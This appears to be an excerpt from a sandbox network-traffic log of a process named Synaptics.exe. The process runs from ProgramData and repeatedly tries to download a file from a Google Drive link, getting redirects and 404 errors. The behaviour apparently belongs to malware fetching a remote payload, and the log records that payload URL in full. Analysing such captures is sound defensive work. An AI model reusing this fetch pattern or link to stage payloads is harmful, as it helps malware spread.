                                                                                                                                      2024-12-30 10:23:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-E_IOEXX06BrzfWjY4xwhbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      38192.168.2.549775142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:15 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5Z4P3avfBG68kaakywAWo0D4olB3OYZ3h4joyVWsUjyI1FvodoeuEcd76Z8tLoQUj3V-x8fJQ
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cL3jY0DY5eSwx2XUiIBHJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:15 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:15 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 6f 42 71 36 62 35 52 42 42 4b 61 65 57 79 79 39 4e 4c 75 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="YoBq6b5RBBKaeWyy9NLuGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:15 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      39192.168.2.549777142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:16 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      40192.168.2.549776142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:16 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      41192.168.2.549778142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      42192.168.2.549779142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      43192.168.2.549785142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:17 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                                                                                                                                      2024-12-30 10:23:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:17 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-j1uWCpJQdcsiUQgEui991g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      44192.168.2.549786142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:17 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                                                                                                                                      2024-12-30 10:23:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:17 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-tTjONokO1jGxYNdoI0ZdnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      45192.168.2.549790142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:18 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5NlPf77H95aFktjKQKcbA_Ze9gfSujdXXHRJGFSJ-7blKvJh0kUYub9GoabjdkTWtMsNLgARY
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-bpq8664In8p0MgBiYt_2rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:18 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:18 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 39 39 63 43 4a 79 5f 59 4e 59 41 5a 67 6a 62 75 73 55 45 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="v99cCJy_YNYAZgjbusUE1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:18 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      46192.168.2.549791142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:18 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4N65YpwYZjP31z5M0zcce2zYlEOuDq8V_SG4IpFmwSDAiyQh6RcYvyKHR2YJi3otPTDCfKeOg
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-43vGkHfn5CAi81PUAVue3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:18 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:18 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 6b 43 6f 63 78 63 75 62 41 55 51 56 68 61 41 6f 72 69 4a 6a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="gkCocxcubAUQVhaAoriJjg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:18 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      47192.168.2.549789142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:18 UTC1314INHTTP/1.1 303 See Other
